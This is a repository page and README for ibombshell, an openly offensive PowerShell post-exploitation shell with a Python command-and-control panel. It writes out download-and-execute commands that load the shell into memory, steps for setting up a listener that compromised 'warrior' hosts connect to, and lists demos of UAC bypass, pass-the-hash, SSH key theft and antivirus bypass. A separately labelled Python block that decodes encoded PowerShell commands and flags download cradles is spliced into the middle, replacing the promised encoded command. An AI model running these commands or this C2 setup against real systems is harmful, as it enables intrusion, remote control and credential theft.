  • Stars: 308
  • Rank 135,712 (Top 3 %)
  • Language: Python
  • License: GNU General Publi...
  • Created over 6 years ago
  • Updated over 3 years ago

Repository Details

Tool to deploy a post-exploitation prompt at any time

ibombshell - Dynamic Remote Shell

      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell is a tool written in PowerShell that gives you a prompt at any time with post-exploitation functionality (and, in some cases, exploitation). It is a shell that is downloaded directly to memory and provides access to a large number of pentesting features. These features can also be downloaded directly to memory, each in the form of a PowerShell function. This form of execution is known as everywhere.

In addition, ibombshell provides a second execution mode called Silently, in which the pentester runs an instance of ibombshell (called a warrior). The compromised computer connects to a C2 panel over HTTP, so the pentester can control the warrior and load functions into memory. This takes place within the post-exploitation phase.

Prerequisites

To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub repository, "PowerShell for every system!".

To run ibombshell in silently mode you need Python 3.6 and some Python libraries. You can install them with:

cd ibombshell\ c2/
pip install -r requirements.txt

Note: ibombshell C2 works on Python 3.x. Make sure you run the pip that belongs to this version.

Usage

ibombshell has two execution modes:

ibombshell everywhere

To load ibombshell, simply run in PowerShell:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console')

Now you can run the downloaded ibombshell console running:

console

ibombshell everywhere in isolated environments

If you need to use ibombshell in isolated environments, you must prepare your computer first in a networked environment. Load all the functions you will need, and use savefunctions to save them in the Windows registry.

Now you can use this Base64-encoded command to get ibombshell:

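The argument to `powershell.exe -E` is the script text encoded as UTF-16LE and then Base64, so it can be decoded and inspected wherever process command lines are logged. The following is an added example, not code from the ibombshell project: it decodes that argument and tags indicators that appear in this page's commands. The sample command lines, the `example.invalid` URL and the `hkcu:\software\example` key are constructed for illustration.

```python
import base64
import binascii
import re

# Indicators drawn from the commands shown on this page; illustrative, not exhaustive.
INDICATORS = {
    "invoke-expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download-cradle": re.compile(r"net\.webclient|downloadstring", re.I),
    "registry-read": re.compile(r"\bhk(?:cu|lm):", re.I),
}
# A flag followed by a plausible Base64 argument, optionally quoted.
ARG = re.compile(r"""[-/](\w+)\s+["']?([A-Za-z0-9+/=]{16,})["']?""")


def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (or an abbreviation), else None."""
    for flag, blob in ARG.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec.
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None


def triage(cmdline):
    """Return sorted indicator names found in the decoded script ([] if none)."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return []
    return sorted(name for name, rx in INDICATORS.items() if rx.search(script))


def encode_sample(script):
    """Build a constructed test input the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines (not captured from a real host).
SAMPLES = [
    'powershell.exe -NoProfile -E "' + encode_sample(
        "iex (new-object net.webclient).downloadstring('https://example.invalid/console')") + '"',
    "powershell.exe -enc " + encode_sample("Get-Date | Out-String"),
    "powershell.exe -e " + encode_sample(r"$c = (Get-ItemProperty 'hkcu:\software\example').code; $c | iex"),
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line), "<-", line[:60])
```
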

ibombshell silently mode

This version allows you to run the ibombshell console and control it remotely from the C2 panel written in Python. To run this version, first launch the console process in PowerShell:

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Telefonica/ibombshell/master/console')

In the ibombshell C2 path, prepare the C2:

python3 ibombshell.py

Then create the listener that the warriors will connect to:

iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

The default listener port is 8080. Finally, launch the console in silently mode on the host to get remote control:

console -Silently -uriConsole http://[ip or domain]:[port]

ibombshell C2 scheme

The basic operation of the ibombshell control panel follows this scheme:

        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

We have created a Docker container with everything you need to make it work. Run these commands from the Dockerfile location.

sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Example videos

Some example videos...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC of use from macOS

ibombshell: Extracting Private SSH Keys on Windows 10

ibombshell: Module for extracting private SSH keys on Windows 10

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Silent mode for the UAC Environment Injection bypass

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - AMSI & Windows Defender Bypass

License

This project is licensed under the GNU General Public License; see the LICENSE file for details.

Contact

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. WHENEVER YOU MAKE A CONTRIBUTION TO A REPOSITORY CONTAINING NOTICE OF A LICENSE, YOU LICENSE YOUR CONTRIBUTION UNDER THE SAME TERMS, AND YOU AGREE THAT YOU HAVE THE RIGHT TO LICENSE YOUR CONTRIBUTION UNDER THOSE TERMS. IF YOU HAVE A SEPARATE AGREEMENT TO LICENSE YOUR CONTRIBUTIONS UNDER DIFFERENT TERMS, SUCH AS A CONTRIBUTOR LICENSE AGREEMENT, THAT AGREEMENT WILL SUPERSEDE.

This software doesn't have a QA Process. This software is a Proof of Concept.

If you have any problems, you can contact:

[email protected]
